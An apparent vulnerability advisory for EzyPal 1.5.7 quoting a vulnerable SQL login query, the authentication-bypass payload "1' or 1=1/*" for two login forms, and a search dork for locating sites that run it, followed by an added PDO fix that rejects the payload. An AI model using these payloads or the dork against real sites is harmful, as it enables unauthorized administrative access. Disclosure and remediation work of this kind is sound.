Author: ~!Dok_tOR!~
Product: EzyPal
Version: 1.5.7, possibly earlier versions as well
URL: www.ezypal.com
Vulnerability Class: SQL injection

1. /[installdir]/admincp/index.php

Vuln Code:

PHP:
$sql = mysql_query("SELECT customer_email FROM ".$config['db_pref']."customers WHERE customer_email = '".$customer_email."' AND customer_password = '".md5($customer_pass)."' AND customer_level = 2") or ErrorDB(2,mysql_errno(),mysql_error());

magic_quotes_gpc = Off

Example:

http://[server]/[installdir]/admincp/index.php

Email Address: 1' or 1=1/*
Password: 1' or 1=1/*

2. Example:

http://[server]/[installdir]/index.php?do=account

Email Address: 1' or 1=1/*
Password: 1' or 1=1/*

Dork: Powered by EzyPal Welcome :: EzyPal
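A hardened form of the login query quoted above, as an added example that is not part of the original advisory and not EzyPal's own code: the same lookup with bound parameters through PDO, run against a constructed in-memory SQLite table. The ezy_ prefix, the sample rows and the admin_login() helper are assumptions made for illustration.

```php
<?php
// Added example, not EzyPal code. Table and column names follow the query in
// the advisory; the "ezy_" prefix, sample rows and admin_login() are constructed.

function admin_login(PDO $db, string $prefix, string $email, string $pass): bool
{
    // A table prefix cannot be bound as a parameter, so allow-list its characters.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    $stmt = $db->prepare(
        "SELECT customer_email FROM {$prefix}customers
          WHERE customer_email = :email
            AND customer_password = :hash
            AND customer_level = 2"
    );
    // Values travel separately from the SQL text, so quotes and comment
    // markers in the input are compared as data and never parsed as SQL.
    // md5() is kept only to match the stored format implied by the advisory's query.
    $stmt->execute([':email' => $email, ':hash' => md5($pass)]);
    return $stmt->fetchColumn() !== false;
}

// Constructed in-memory database so the example runs offline (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE ezy_customers (
    customer_email TEXT, customer_password TEXT, customer_level INTEGER)");
$ins = $db->prepare("INSERT INTO ezy_customers VALUES (?, ?, ?)");
$ins->execute(['admin@example.test', md5('correct horse'), 2]);
$ins->execute(['user@example.test', md5('hunter2'), 1]);

$cases = [
    ['admin@example.test', 'correct horse'],   // valid admin account
    ['user@example.test', 'hunter2'],          // valid account, but not level 2
    ["1' or 1=1/*", "1' or 1=1/*"],            // input strings from the advisory
];
foreach ($cases as [$email, $pass]) {
    $result = admin_login($db, 'ezy_', $email, $pass) ? 'accepted' : 'rejected';
    printf("%-22s => %s\n", $email, $result);
}
```

Only the first case is accepted. Because the fix is in how the query is built, it does not depend on the magic_quotes_gpc setting.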